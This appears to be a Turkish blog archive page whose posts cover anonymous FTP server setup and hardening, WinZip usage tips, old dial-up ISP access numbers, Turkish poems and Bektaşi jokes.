Sizde istediginiz uygulamalari /etc , /bin, ve /lib klasrlerinden alip buraya yerlestirebilirsiniz.Sunucu guvenligi icin bu klasorlerde mumkun oldugunca az yazilim bulundurulmalidir.


~ftp/lib klasoru ~ftp/bin klasorundeki programlarin ihtiyac duydugu kitaplik dosyalarini barindirir.


~ftp/pub klasoru sizin halka acik olarak dagitacaginiz yazilimlari veya dosyalari koyabileceginiz klasordur.


Eger bu "isimsiz" kullanicilara (halka acik FTP sunucusuna baglanan ve kimlikleri belli olmayan kisiler) sunucuya "dosya yukleme" yetkisi vermek isterseniz asagidaki adimlari izlemeniz gereklidir :




1.Yeni bir klasoru ~ftp dizini altinda "yuklenen dosyalarin saklanmasi" icin yaratin.Bu klasor genellikle "incoming" olarak isimlendirilir.Burada da "incoming" isminde bir klasor yarattiginizi kabul edecegiz.


2.Asagidaki satiri /etc/ftpaccess dosyaniza ekleyin :


upload /home/ftp /incoming yes root ftp 0600 nodirs



3.Yukaridaki satirda gecen /home/ftp klasoru'nun sizin sisteminizdeki dogru yolu gosterdigine emin olunuz.Ornegin sizin ~ftp klasorunuz ('ftp' kullanicisi icin ev dizini) /data/ftp ise lutfen yukaridaki ayarda /home/ftp yerine /data/ftp yaziniz.Eger kullanicilarin alt dizinleri olusturmasina izin vermek istiyorsaniz "nodirs" yazan yeri siliniz.


4.Asagidaki komutlari uygulayin.



chown -R root.ftp ~ftp/incoming
chmod -R 1733 ~ftp/incoming



chown komutu ile "incoming" klasoru root kullanicisina ve ftp grubuna dahil ediliyor.


chmod komutu ile "incoming" klasoru icin izinler belirleniyor."root" icin "okuma yazma ve calistirma" haklari, grup ve digerleri(tum dunya) icin ise "yazma ve calistirma" izinleri verilmis oluyor. Ayni zamanda bu komut ile "sticky bit" dedigimiz (1733 te yer alan 1 rakami bunu gosteriyor.) dosyalari silinmekten koruyan parca da dosya izinlerine ekleniyor.Normalde yazma hakki ile gelen dosya silme izni bununla yanlizca dosyanin sahibine veriliyor…Yani sadece root kullanicisi sunucuya yuklenen dosyalari silme hakkina kavusuyor.(Sunucuya baglanan kisilere herhangi bir okuma hakki vermedigimiz icin ~ftp/incoming klasorundeki dosya adlari "ls -l" ile goruntulenmezler.Eger kisi dosyanin adini biliyorsa halen dosyayi download edebilir.)


5."isimsiz" kullanici icin /etc/ftpaccess dosyasinda "anonymous" taniminin yazili olmasi gereklidir.Bu dosya ongorulen olarak bu kayida sahiptir ve sizin herhangi bir degisiklik yapmaniza gerek yoktur..Eger bu dosyada "all" ile tanimli sinif icin "real,guest,anonymous" yazan yeri degistirdiyseniz bu dosyaya bu tanimlari tekrar eklemeniz gereklidir.



Guvenlik


"Halka acik bir FTP sunucusu kurmak" basli basina bir guvenlik riskidir.Bu sunucuya dosya yukleme izni vermek bu riski daha da arttirir.Dunya uzerinde bu isi yapan sayisiz kurulus vardir ve yillaraca herhangi bir problem olmadan sunucularini ayakta tutabilmeyi basarmislardir.


Asagidaki maddelere goz atmaniz sizinde sorunsuz bir FTP sunucusu yonetmeniz icin gereklidir :



# /etc/passwd icinde yer alan 'ftp' kullanicisina ait sifre mutlaka "gecersiz bir yapida" olmalidir.Ornek vermek istersek :



ftp:*:14:50:FTP User:/home/ftp:/bin/true



# ~ftp/bin klasoru mutlaka root kullanicisina ait olmalidir.Bu klasor icindeki hizmet yazilimlarida (ls,tar, compress vb.) mutlaka root kullanicisina ait olmalidir.Bu klsor icindeki dosyalar yanlizca "uygulanabilir" dosya izinine sahip olmalidir (executable)


Tum bunlar icin asagidaki komutu uygulayin :



chown -R root.root ~ftp/bin; chmod -R 111 ~ftp/bin



# ~ftp/etc klasoru yanlizca root kullanicisina ait ve yanlizca "uygulanabilir" dosya izinlerine sahip olmalidir.


Tum bunlar icin asagidaki komutu uygulayin :



chown -R root.root ~ftp/etc; cd ~ftp/etc; chmod 444 *



# Hic bir zaman /etc/passwd ve /etc/group dosyalarini ~ftp/etc klasorune kopyalamayiniz.Burada yer alacak /etc/passwd ve /etc/group dosyalari bazi programlari kandirmak icin oradadir.Normalde "chroot" kullanarak ayarlanan klasorden sunucu kok dizinine cikmak imkansizdir.Bu nedenle bazi programlar bu dosyaya gerek duyduklarinda orada olmalari gerektigi icin oradadirlar.


# ~ftp klasorundeki hic bir dosya 'ftp' kullanicisina ait olamamalidir.



Makale ile ilgili her turlu yorumunuzu serkan@turk-php.com adresine gonderebilirsiniz…


Serkan Hadi Ceylani
serkan@turk-php.com


Kaynak :0-7645-4786-0

0 yorum  

Winzip: Hints and Tips

Etiketler: Gönderen blogger on zaman: 15:50

Hints and Tips
Here are the hints and tips displayed by the "Tip of the Day" dialog box:

* The Tip of the Day dialog box is normally displayed when you start WinZip but are not automatically opening a Zip file. You can change this option so tips are never displayed, or always displayed when WinZip is started.

If you turn the Tip of the Day off and later want to restore it, select Tip of the Day from the WinZip Help pull-down menu, then select from the combo box at the bottom of the dialog box.

* If you are new to Zip files, you can use the Wizard interface to walk you through the process of unzipping or installing software in Zip files. Select Wizard from the WinZip File menu to activate the Wizard.

* You can add, remove, or reorder buttons on the WinZip toolbar by right clicking on the toolbar and choosing Select Buttons.

* WinZip's toolbar buttons look much better if your display is in high-color mode.

Click "Control Panel" in the Start menu's Settings entry. Double-click "Display" and select the Settings tab. Choose "High Color" mode for Color Palette (under Windows NT 4.0 select 65536).

* You can use Quick View, the optional Windows file viewing utility, to view files without associations. If Quick View is not installed, see the section of the Help file titled of the Help file "Installing QuickView". To use Quick View with WinZip, select Configuration from WinZip's Options menu, click the Program Locations tab, type "quikview" (without the quotes) in the Default association field, and click OK.

* Learn to use the Windows help system! You will quickly make up for the time you spend learning it by being more productive in all your Windows applications. To get started select How to Use Help from the Help menu.

* For a Brief Tutorial on WinZip, select Brief Tutorial from the WinZip Help pull-down menu.

* For quick zipping and unzipping, you can right-click on a file listed in Explorer and choose Add to Zip or Extract To from Explorer's context menu.

* You can unzip all files from a Zip without leaving the Explorer. Use the right mouse button to drag and drop a Zip file from an Explorer window to any folder, then choose Extract To from the context menu. Be sure to use the right mouse button while dragging.

* You can create Zip files in the Explorer: right click in the Contents pane, then select New and WinZip File. An empty Zip file will be created in the current folder.

* Mailing your Zip files is easy! If you are using a MAPI-compatible mail system, you can mail Zip files using the Mail Archive entry in the WinZip File menu. Or, click the WinZip status line, drag it, and drop it on your e-mail program.

* If you usually use the same folders when opening, extracting, or adding files, specify those folders in the Configuration | Folders dialog box.

* You can run your virus scanner on the files inside downloaded Zip files. Choose Virus Scan from WinZip's Actions menu.

* If you need to send files to users who may not have an unzip utility, try "WinZip Self-Extractor Personal Edition" (included with WinZip). The self-extractor makes files that unzip themselves. First create a zip file, then select Make .Exe File from the WinZip Actions menu.

* To change the default WinZip window size and position to the current window size and position, choose Save Settings Now from the Options menu.

* To display details about the open Zip file (for example, the date the Zip file was last modified or the name of the folder containing the Zip file), click on the WinZip status line or select Properties from the WinZip File menu.

* You can make a Zip file that spans multiple disks. Simply create a Zip file on a removable disk, then add files to the Zip as you normally would. If the disk fills up while files are being added, you will be prompted for another disk. Just insert the next disk and click the OK button.

* The file listing for an archive can be quickly sorted by any of the fields displayed in the file listing. Just click on any column title to sort on it.

* You can interrupt an archive operation by clicking anywhere in the WinZip window. This will activate the "Operation Interrupted" dialog box.

* You can quickly extract files from a Zip file by dragging the files from WinZip to any folder or Explorer window (or even to the desktop).

* You can quickly add files to a Zip file by dragging the files from any folder or Explorer window to WinZip.

* WinZip has many features that make it easy to work with files downloaded from Internet, bulletin boards, and online services like America Online and CompuServe. For a list of hints, see the Help file section "Hints For Working With Downloaded Files".

* Besides Zip files, WinZip processes many other formats, including TAR, Z, GZ, TGZ, CAB, UUencode, BinHex, and MIME.

* If you can't remember where you put your Zip files, you can use the Favorite Zip Folders feature to find them. Select Favorite Zip Folders from the WinZip File menu.

* You can easily view files in a Zip file by dragging them to an application or a shortcut to an application.

* You can easily print files by dragging them to a printer or shortcut to a printer. (To print a list of files in a Zip, select Print from the File menu.)

* Zip files opened with WinZip are added to the Start menu's Documents list. To quickly open Zips that you have recently worked with, select Documents from the Start menu.

* You can add selected files to a Zip directly from the Explorer with complete control over the options. RIGHT-click on any file (or selected group of files) and choose Add To Zip from the context menu.

* Answers to frequently asked questions are available by selecting Frequently Asked Questions from WinZip's Help menu.

19 yorum  

Dial-up İnternet Erişim Numaraları

Etiketler: , Gönderen blogger on 8 Temmuz 2007 Pazar zaman: 05:21

AdaNet:
Dns 1: 195.174.111.5
Dns 2: 195.174.111.1
Ankara : 0822 314 40 02
Ankara : 0822 3144097

AIDATA-Net:
Ankara : 0822 3145098
Antalya : 0822 5110004
Bursa : 0822 2932000
Denizli : 0822 4491101
İskenderun : 0822 5376000
İstanbul : 0822 2111203
İzmir : 0822 4152101
Samsun : 0822 3531000

Atlas Online:
Istanbul : 0822 2112500
Istanbul : 0822 2610102

B-Net:
Istanbul ISDN : 0822 2111204
Adana ISDN : 0822 5214505
Izmir ISDN : 0822 4158003
Bursa ISDN : 0822 2931004
Istanbul Acibadem : 0822 2610102
Ankara : 0822 3144007
Istanbul : 0822 2111001

Beko-Net:
Bursa : 0822 2931200
Istanbul : 0822 2111032

Bi-Net:
Ankara : 0822 3145000
Ankara : 0822 3145002

Bir-Net:
Ankara : 0822 3144050
Ankara : 0822 3144051

BM-Net:
Istanbul : 0822 2612900
Ankara : 0822 3145000

Dominet:
Ankara : 0822 3144000
Ankara : 0822 3144001

DorukNet:
Istanbul : 0822 2111005
Istanbul : 0822 2111002

Escortnet:
Ankara : 0822 3143000
Izmir : 0822 4151002
Istanbul(ISDN) : 0822 2618401
Istanbul(ISDN) : 0822 2618402
Istanbul(ISDN) : 0822 2618403
Anadolu Yakasi: 0822 2618405
Ankara : 0822 3143000
Ankara : 0822 2931002

ForNet:
1.dns:194.54.32.130
2.dns:194.54.26.142
Istanbul : 0822 2111012
Istanbul : 0822 2111211

Future Net:
Adana : 0822 5214500

Garanti Net:
Istanbul : 0822 2615602
Ankara: 0822 3144096
Ankara: 0822 3144099

İhlasNet:
0822 2116010
0822 2117001
0822 2115555

Kilim Net:
Istanbul : 0822 2614102

Market Web:
0822 3144089
0822 3144098
0822 3144005
0822 3144011
0822 3144006

NetCom Online:
Izmir : 0822 3610000
Istanbul : 0822 2111016
Istanbul : 0822 2111206

Net-One:
Istanbul : 0822 2111206
Istanbul : 0822 2111207
Istanbul : 0822 2111016

Orionnet:
0822 2112007
0822 2931005
0822 2112402

Prizma Net:
İstanbul 1 : 0822 2111208
İstanbul 2 : 0822 2111006
Ankara : 0822 3144009
Bursa : 0822 2931100

RaksNet:
Ankara (ISDN) : 0822 3144020
Izmir : 0822 4151600
Istanbul : 0822 2111022
Izmir : 0822 4152100

SimNet:
Ankara : 0822 314 4096
Ankara : 0822 3144099
Istanbul : 0822 2615600
Istanbul : 0822 2615601
Istanbul : 0822 2615602
Istanbul : 0822 4158000
Istanbul : 0822 2931101
Kadikoy : 0822 2630010


Superonline:
Istanbul Kadikoy : 0822 2630000
Istanbul (1500): 0822 2120000
Istanbul Levent 1 (564 hat) : 0822 2111011
Istanbul Levent 2 (576 hat) : 0822 2111031
Istanbul Levent 3 (600 hat) : 0822 2111200
Istanbul Kadıköy (428 hat) : 0822 2614110
Istanbul Ataköy (696 hat) : 0822 2116200
Istanbul Beyoğlu (624 hat) : 0822 2112501
Istanbul Bakirkoy (378 hat) : 0822 2116003
Ankara Kizilay 1 (256 hat) : 0822 3145001
Ankara Kizilay 2 (240 hat) : 0822 3145099
Ankara Guvenevler (192 hat) :0822 3144016
İzmir Kordon 1 (288 hat) : 0822 4151601
İzmir Konak (360 hat) : 0822 415 1111
İzmir Bornova (288 hat) : 0822 4155201
Izmir Karsiyaka (288 hat) : 0822 4154500
Izmir Kemalpasa (144 hat) : 0822 4159000
Bursa (48 hat) : 0822 2932002
Denizli (96 hat) : 0822 4491100
Antalya (192 hat) : 0822 5110001
Adana (192 hat) : 0822 5213500
Mersin (288 hat) : 0822 5311100
Tarsus (96 hat) : 0822 5312000

TR-NET:
Ankara : 0822 3144004
Ege : 0822 4151602
Ankara : 0822 3144091
Ankara : 0822 3141004
Ankara : 0822 3144004

TURKNET:
Istanbul Avrupa Yakasi ISDN (1) : 0822 2112400
Istanbul Avrupa Yakasi (2) : 0822 2112000
Istanbul Avrupa Yakasi (3) : 0822 2112011
Istanbul Anadolu Yakasi ISDN : 0822 2615603
Ankara ISDN : 0822 3144095
Ege Bolgesi ISDN : 0822 4151112
Akdeniz Bolgesi ISDN : 0822 5110006
Tum Turkiye ISDN (1) : 0822 2112400
Tum Turkiye ISDN (2) : 0822 3144095
Tum Turkiye (3) : 0822 2112000
Tum Turkiye (4) : 0822 2112011
Istanbul : 0212 2200024
Istanbul : 0212 2101717
Istanbul ISDN : 0212 3133000
Izmir ISDN : 0232 4550090

UNIMEDYA
1.DNS: 144.122.199.20
2.DNS: 195.174.24.2
Izmir : 0822 4151100

VESTEL NET:
Istanbul Gayrettepe : 0822 2111201
Istanbul Gayrettepe : 0822 2111216
Istanbul Avcilar : 0822 2116002
Izmir : 0822 4157000
Ankara Kizilay : 0822 3144092

0 yorum  

Şiirler

Etiketler: , Gönderen blogger on zaman: 04:50

Kısa Bir Öyküdür Hayat

kısa bir öyküdür hayat
uğruna upuzun acılar çektiğimiz
kısa bir türküdür
bir kez daha söylemek için delirdiğimiz


YILMAZ ODABAŞI

Sana, Bana, Vatanıma, Ülkemin İnsanlarına Dair

.

``Telgrafın tellerini kurşunlamalı’’
Öyle değildi bu türkü bilirim
Bir de içime
-Her istasyonda duran sonra tekrar yürüyen-
Bir posta katarı gibi simsiyah dumanlar dökerek
Bazan gelmesi beklenen bazan ansızın çıkagelen
Haberler bilirim mektuplar bilirim.

Gamdan dağlar kurmalıyım
Kayaları kelimeler olan
Kırk ikindi saymalıyım
Kırk gün hüzün boşaltan omuzlarıma saçlarıma
Saçlarının akışını anar anmaz omuzlarından
Baştan ayağa ıslanmalıyım
Gam dağlarına çıkıp naralar atmalıyım.

İçimde kaynayan bir mahşer var
Bu mahşer birde annelerinin kalbinde kaynar
Çünkü onlar yün örerken pencere önlerinde
Ya da çamaşır sererken bahçelerinde
Birden alıverirler kara haberini
Okul dönüşü bir trafik kazasında
Can veren oğullarının.

Bir de gencecik aşıkların yüreklerini bilirim
Bir dolmuşta yorgun şoförler için bestelenmiş
Bir şarkıdan bir kelime düşüverince içlerine
Karanlık sokaklarına dalarak şehirlerin
Beton apartmanların sağır duvarlarını yumruklayan
Ya da melal denizi parkların ıssız yerlerinde
Örneğin Hint Okyanusu gibi derin
İsyanın kapkara sularına dalan.

Nice akşamlar bilirim ki
Karanlığını
Bir millet hastanesinde
Dokuz kişilik kadınlar koğuşu koridorunda
Başını kalorifer borularına gömmüş
Beyaz giysilerinden uykular dökülen tabiplerden
Haber sormaya korkan
Genç kızların yüreğinden almıştır.

Bir de baharlar bilirim
Apartman odalarında büyüyen çocukların bilmediği bilemeyeceği
Anadolu bozkırlarında
İstanbul’dan çıkıp Diyarbekir’e doğru
Tekerleri yamalı asfaltları bir ağustos susuzluğu ile içen
Cesur otobüs pencerelerinden
Bilinçsiz bir baş kayması ile görülen
Evrensel kadınların iki büklüm çapa yaptıkları tarla kenarlarında
Çıplak ayakları yumuşak topraklara batmış ırgat çocuklarının
Bir ellerinde bayat bir ekmeği kemirirken
Diğer ellerinde sarkan yemyeşil bir soğanla gelen.

Yazlar bilirim memleketime özgü
Yiğit köy delikanlılarının
İncir çekirdeği meselelerle birbirlerini kurşunladıkları
Birinin ölü dudaklarından sızan kan daha kurumadan
Üstüne cehennem güneşlerde göğermiş mor sinekler konup kalkan
Diğeri kan ter içinde yayla yollarında
Mavzerinin demirini alnına dayamış
Yüreği susuzluktan bunalan
İçinden mahpushane çeşmeleri akan
Ansızın parlayan keklikleri jandarma baskını sanıp
Apansız silahına davranan
Nice delikanlıların figüranlık yaptığı
Yazlar bilirim memleketime özgü

Güzler bilirim ülkeme dair
Karşılıksız kalmış bir sevda gibi gelir
Kalakalmış bir kıyıda melül ve tenha
Kalbim gibi
Kaybolmuş daracık ceplerinde elleri
Titreyen kenar mahalle çocukları
Bir sıcak somun için, yalın kat bir don için
Dökülürler bulvarlara yapraklar gibi.

Kadınlar bilirim ülkeme ait
Yürekleri Akdeniz gibi geniş, soluğu Afrika gibi sıcak
Göğüsleri Çukurova gibi münbit
Dağ gibi otururlar evlerinde
Limanlar gemileri nasıl beklerse
Öyle beklerler erkeklerini
Yaslandın mı çınar gibidir onlar sardın mı umut gibi.

İsyan şiirleri bilirim sonra
Kelimeler ki tank gibi geçer adamın yüreğinden
Harfler harp düzeni almıştır mısralarında
Kimi bir vurguncuyu gece rüyasında yakalamıştır
Kimi bir soygun sofrasında ışıklı sofralarda
Hırsızın gırtlağına tıkanmıştır.

Müslüman yürekler bilirim daha
Kızdı mı cehennem kesilir sevdi mi cennet
Eller bilirim haşin hoyrat mert
Alınlar görmüşüm ki vatanımın coğrafyasıdır
Her kırışığı sorulacak bir hesabı
Her çizgisi tarihten bir yaprağı anlatır.

Bütün bunların üstüne
Hepsinin üstüne sevda sözleri söylemeliyim
Vatanım milletim tüm insanlar kardeşlerim
Sonra sen gelmelisin dilimin ucuna adın gelmeli
Adın kurtuluştur ama söylememeliyim
Can kuşum, umudum, canım sevgilim.

.

Erdem Beyazit


KUCUGUM

Kucugum daha cok kucugum
Bu yuzden butun hatalarim
Ogunmem bu yuzden
Bu yuzden kendimi,ozel onemli zannetmem

Kucugum daha cok kucugum
Bu yuzden butun sacmalamam
Yenilmem bu yuzden
Bu yuzden kendime hala guvensizligim

Ne kadar az yol almisim
Ne kadar az ,yolun basindaymisim meger
Elimde yalandan kocaman rengarenk
Gecici oyuncak zaferler

Kucugum daha cok kucugum
Bu yuzden butun korkularim
Gururum bu yuzden
Bu yuzden cocuk gibi korunmasizligim

Kucugum daha cok kucugum
Bu yuzden sonsuz endisem
Savunmam bu yuzden
Bu yuzden bir kucuk iz birakmak icin didinmem

IMLASIZ

Hep denedin. Hep yenildin.
Olsun. Gene dene, gene yenil.
S. Beckett

Ayagi kayan bir çocuk
Kadar saskinim, bilemedim
Düz yolda yürümenin imlâsini
Kanayan dizlerime bakip da
Aglamayi ögrenemedigim gibi

Sevgilisi degildim kadinlarimin
Bir papagan tünegiydim belki
Ama birkaç sözcük ögrendiysem
Kadinlardan ögrendim, yine de
Bilemedim sevgilim diyebilmeyi

Büyülendim ama büyüyemedim
Aklim ermedi aynalara ve suya
Yüzümü gösterip kalbimi neden
Sakladiklarini ögrenemedim
Saskinim, cahilim ben bu dünyada

Ahmet Telli

Dag Rüzgari

Kaderde senden ayri düsmekte varmis
Dogrusu bunu hiç düsünmemistim..
Seni tanimadan
Hele seni böyle deli divane sevmeden
Yalnizlik güzeldir diyordum
Al basini, kaç bu sehirden
Ufukta bir çizgi gibi gördügün daglara
Rüzgarin iyot kokularini tasidigi denizlere git
Git gidebildigin yere git diyordum
Oysa ki, senden kaçilmazmis
Yokluguna birgün bile dayanilmazmis.
Bilmiyordum..

Yine de dayanmaga calisiyorum iste
Bir kir çiçegi kopariyorum gözlerine benzeyen
Geçen bulutlara sesleniyorum ellerin diye
Rüzgar güzel bir koku getirmisse
Saçlarini oksayip gelmistir diyerek avunuyorum
Yasamak seninle bir baska zamani
Bir baska zamanda seni yasamak
Herseyden önce sen
Elbette sen
Mutlaka sen
Ister uzaklarda ol
Ister yanibasimda dur
Sen ol yeter ki bu zaman için de
Ben olmasam da olur
Seni bir yumaga sariyorum yillardir
Bitmiyorsun
Çaresizligim gün gibi asikar
Su olup çesmelerden akan güzelligin
Inceligin isik isik yüzüme vuran
Sen günes kadar sicak
Tabiat kadar gerçek
Sen bahçelerde çiçekler açtiran
Sudan, havadan, günesten yüce varlik
Sen, o tek sevgi içimde
Sen görebildigim tek aydinlik

Bir nefeste benim için al
Havasizliktan öldürme beni
Bulutlara, yildizlara benim için de bak
Susadim diyorsam
Bir yudum su içmelisin
Ben yorulduysam sen uyumalisin
Ellerim sevilmek istiyor
Saçlarim oksanmak istiyor
Dudaklarim öpülmek istiyor
Anlamalisin.

Agaçlarin yesili kalmadi
Gökyüzünün mavisi yok
Bu daglar o daglar degil
Rüzgarinda kekik kokusu yok
Kim bu çaresiz adam
Bu kan çanagi gözler kimin
Kaç gecedir uykusu yok
Gündüzü yok
Gecesi yok
Yok
Yok
Anladim
Sensiz yasanmaz bu dünyada
Imkani yok.

Ümit Yasar Oguzcan

0 yorum  

Şiirler

Etiketler: , Gönderen blogger on zaman: 04:48

KARDELEN

Bozkir ortasinda bir sabah
Bir cicek gordum karlar ustunde
İsmi Kardelen
Kardelen gun isigina tutkundu
Uzatmisti boynunu ask icinde
" Vur, diyordu , vur istersen sabah ayazi
" Vur incecik boynumu karlar ustune
"Olumden zerre kadar korkum yok benim
"Olumlerin en guzeli gun isiginda
"Olumlerin en guzeli baharla gelen
"Ben gun isigina tutkunum
"İsmim Kardelen
"Sabredemedim uc bes gun daha
"Bekleyemedim karlarin erimesini
"Bir tuhaf sanci yayildi tohumuma vakitsiz
"Uzanip gun isigini opmek geldi icimden
"Olumlerin en guzeli gun isiginda
"Olumlerin en guzeli baharla gelen
"Ben gun isigina tutkunum
"İsmim Kardelen"

Macit Benice




GİDEREK DAHA UZAK

Giderek daha uzak, giderek daha ıssız bir yerden
Ve yalnızca düşlerde görebilirim seni.
Sana yazsam, hava yakar mektuplarımı.
Karşılamaya gelsem seni, atım tökezler.

Yol boyunca aldığım yaralardan
Başka bir şey değilim, sana ulaştığımda.
Gözlerinde yansıyan, bölünen ve bozulan
Kendimden son ayrılıştan başka bir şey değilim.

Yolun iki yanında, gerideki dağları işaret eden,
Yüzlerini beyaza boyamış iki kişi:
Sen, ağızlarından akan kanın.
Ve ellerindeki bıçakların farkına varmadan,
Sırtın bana dönük, geçerken yanlarından,
Seslensem, eritir onları gözyaşların...

HENRIK NORDBRANDT
(Danimarkalı şair)
"Şiir Atlası" kitabından 26/04/2000




ÇOCUKLARIM

Sizi ben yoklama defterinden öğrenmedim
Haylaz çocuklarım
Sınıfın en devamsızını
Bir sinema dönüşü tanıdım
Koltuğunda satılmamış gazeteler
Dumanlı bir salonda
Kendime göre karşılarken akşamı
Nane şekeri uzattı en tembeliniz..
Götürmek istedi küfesinde
Elimdeki ıspanak demetini
En dalgını sınıfın
Çoğunuz semtine uğramaz oldu okulun
Palto,ayakkabı yüzünden
Kiminiz limon satar balıkpazarında
Kiminiz Tahtakale'de çaycılık eder
Biz inceleduralım aç tavuk hesabı
Tereyağındaki vitamini
Kalorisini yumurtanın
Karşılıklı neler öğrenmedik sınıfta
Çevresini ölçtük dünyanın
Hesapladık yıldızların uzaklığını
Orta Asya'dan konuştuk
Laf kıtlığında
Birlikte neler düşünmedik
Burnumuzun dibindekini görmeden
Bulutlara mı karışmadık
Güz rüzgarlarında dökülmüş
Hasta yapraklara mı üzülmedik
Serçelere mi acımadık kış günlerinde
Kendimizi unutarak....

RIFAT ILGAZ





KUM

Sen kum nedir bilmezsin
Deniz görmedin ki
Yum gözlerini zamanı düşün,
Deniz bir gözünde
Kum bir gözündedir.

Sen kül nedir bilmezsin
Ateş yakmadın ki.
Uzat ellerini gökyüzüne,
Ateş bir elinde
Kül bir elindedir


Sen aşk nedir bilmezsin
Beni sevmedin ki.
Ağla, ağlayabildiğin kadar.
Bütün güzellikler sende
Aşk bendedir.

Ümit Yaşar OĞUZCAN




DİLENCİ

sen, hergün köşe başlarında
yırtık urbanla kirli ellerinle
avuç açan, sefil insan.

inan yok farkımız birbirimizden.
sen belki tüm yaşamınca dilenecek;
beklediğin beş kuruşu biri vermezse,
ötekinden isteyeceksin.

ama ben, tüm yaşamım boyunca
tek bir kez dilendim,
bir acımasız kalbin sevdası ile alevlendim.
öylesine boş öylesine açık kaldıki elim,
yemin ettim bir daha dilenmeyeceğim.

Victor HOGO





Dag Rüzgari

Kaderde senden ayri düsmekte varmis
Dogrusu bunu hiç düsünmemistim..
Seni tanimadan
Hele seni böyle deli divane sevmeden
Yalnizlik güzeldir diyordum
Al basini, kaç bu sehirden
Ufukta bir çizgi gibi gördügün daglara
Rüzgarin iyot kokularini tasidigi denizlere git
Git gidebildigin yere git diyordum
Oysa ki, senden kaçilmazmis
Yokluguna birgün bile dayanilmazmis.
Bilmiyordum..

Yine de dayanmaga calisiyorum iste
Bir kir çiçegi kopariyorum gözlerine benzeyen
Geçen bulutlara sesleniyorum ellerin diye
Rüzgar güzel bir koku getirmisse
Saçlarini oksayip gelmistir diyerek avunuyorum
Yasamak seninle bir baska zamani
Bir baska zamanda seni yasamak
Herseyden önce sen
Elbette sen
Mutlaka sen
Ister uzaklarda ol
Ister yanibasimda dur
Sen ol yeter ki bu zaman için de
Ben olmasam da olur
Seni bir yumaga sariyorum yillardir

--->





Bitmiyorsun
Çaresizligim gün gibi asikar
Su olup çesmelerden akan güzelligin
Inceligin isik isik yüzüme vuran
Sen günes kadar sicak
Tabiat kadar gerçek
Sen bahçelerde çiçekler açtiran
Sudan, havadan, günesten yüce varlik
Sen, o tek sevgi içimde
Sen görebildigim tek aydinlik

Bir nefeste benim için al
Havasizliktan öldürme beni
Bulutlara, yildizlara benim için de bak
Susadim diyorsam
Bir yudum su içmelisin
Ben yorulduysam sen uyumalisin
Ellerim sevilmek istiyor
Saçlarim oksanmak istiyor
Dudaklarim öpülmek istiyor
Anlamalisin.

Agaçlarin yesili kalmadi
Gökyüzünün mavisi yok
Bu daglar o daglar degil
Rüzgarinda kekik kokusu yok
Kim bu çaresiz adam
Bu kan çanagi gözler kimin
Kaç gecedir uykusu yok
Gündüzü yok
Gecesi yok
Yok
Yok
Anladim
Sensiz yasanmaz bu dünyada
Imkani yok.

Ümit Yasar Oguzcan

0 yorum  

Çeşitli Fıkralar

Etiketler: , Gönderen blogger on zaman: 04:46

BEKTAŞİ FIKRALARI Arkadaşlar fıkaralarınızın burada yayımlanmasını isterseniz bana emaille ulaşın

ALLAH'IN KEMALİ
Bir mecliste Kuranı Kerim'den söz açılmıştı .Kuran'ın eşsizliğinden ve olağanüstü bir eser olduğundan bahsedilirken, odanın bir köşesinde kendi halinde çubuğunu içmekte olan bir Bektaşi söze karışarak :
-Evet, Allah'ın kelamı cidden eşsizdir. Ama, yazısı biraz karışıktır!,...der.
Dinleyenlerden biri hayret ve biraz da hiddetle sorar :
-Karışık mıdır, nereden biliyorsun?
Bektaşi acınacak bir tavırla cevap verir :
-Alnımın yazısından!



ALLAH ŞİMDİ NE YAPIYOR?
Bir gün yolda yaya giden bir Bektaşi'nin önüne bir atlı çıktı :
-Baba, dedi, bir müşkülüm var. Beni aydınlatır mısın?
Bektaşi yanıt verdi :
-Elimden gelen bir şeyse, hay hay, oğlum.
-Şunu öğrenmek istiyorum : Şu anda Allah ne yapıyor?
Sualin münasebetsizliğine içerliyen derviş, hic belli etmemiş :
-Yanıt veririm ama, bir şartla, sen o attan in, ben bineyim.
-Neden?
-Böyle yüksek bir suale yüksekten yanıt vermek gerekir de ondan!
Adam attan inmiş, Bektaşi binmiş.
Adam:
-Hadi, demiş söyle bakalım. Allah şimdi ne yapıyor?
Bektaşi :
-Ne yapacak, demiş, atı senin gibi budalanın elinden alıp, benim gibi akıllıya veriyor, deyip atla uzaklaşmış.



BAYRAMDAN BAYRAMA
Bektaşiye sormuşlar :
-Rakı içer misin?
-Akşamdaaaan akşaaaama...
-Namaz kılar mısın?
-Bayramdan bayrama, bayramdan bayrama...



BEKLİYORUM
Canlardan birine, Ramazanda sormuşlar :
-Erenler kaç tane oruç tuttun?
-Henüz nasip olmadı.Tuzak kurdum bekliyorum.



BEKTAŞİ BU YA...
Müthiş bir fırtına patlamıştı.Yolcuların hepsi perişan durumdaydı.Bunların arasında bir de Bektaşi vardı.
Baktılar, Bektaşi, Allah'a yalvarıp yakarmaya başlamıştı :
-Adını bilmediğim bir evliyaya bir koç adıyorum.Yeter ki fırtına dinsin...
Bektaşi'nin yakarması kaptanın tuhafına gitmişti :
-Hayret! Hiç adını bildiğin bir evliya yok mu?
-Yok olur mu, elbette var! diye cevap verdi Bektaşi.Var da, hepsini birer kez aldattım...



BEKTAŞİ VE SOFU
Koyu sofu bir adamcağızla Bektaşi, bir başka kente gitmek üzere bir kervana katıldılar. Sofu, ikindi üzeri namaz kılacağını söyledi. Bektaşi :
-Geç kalırsan kervanı kaçırırsın ; onun için sünneti bırak da yalnız farzı kılıver, diye öğüt verdi.
Bektaşi'nin sözüne uydu adam. O gece bir yerde konakladılar. Ertesi sabah sofu, Bektaşi'ye sitem etti.
-Dün bana sünneti kıldırmadın, gece rüyama Peygamber Efendimiz girdi.
Bektaşi adamın sözünü ağzına tıkadı :
-Daha ne istiyorsun! Farzı da bırak rüyana bu kez Tanrı girsin!



BİRBİRİNE KARIŞTIRDIN
Bektaşi'nin bir uyuz eşeği ile besili bir ineği varmış...İnekten süt sağıp satıyor, kazandığı paranın yarısıyla uyuz eşeğe arpa alıyormuş.Eşek bir işe yaramıyormuş.Bir gün dayanamayıp dua etmiş :
-Ey yüce Allahım, beni şu eşekten kurtar!
Ertesi sabah ahırın kapısını açmış ki ne görsün?İnek ölmüş eşek kalmış...
Bektaşi o hırsla sokağa fırlayıp milleti başına toplamış :
-Ey ahali şu yerde yatan nedir?
-İnektir!
-Ya şu ayakta duran uyuz?
-Eşektir!
Bektaşi açmış ellerini yukarıya :
-Ey ulu Allahım, sana kırk yılda bir ricada bulunduk, onda da eşekle, ineği birbirine karıştırdın!



BİR GÜN FAZLA TUTMUŞ
Adama sormuşlar :
-Kaç gün oruç tuttun?
-Hastalığım nedeniyle, ancak bir gün tutabildim!
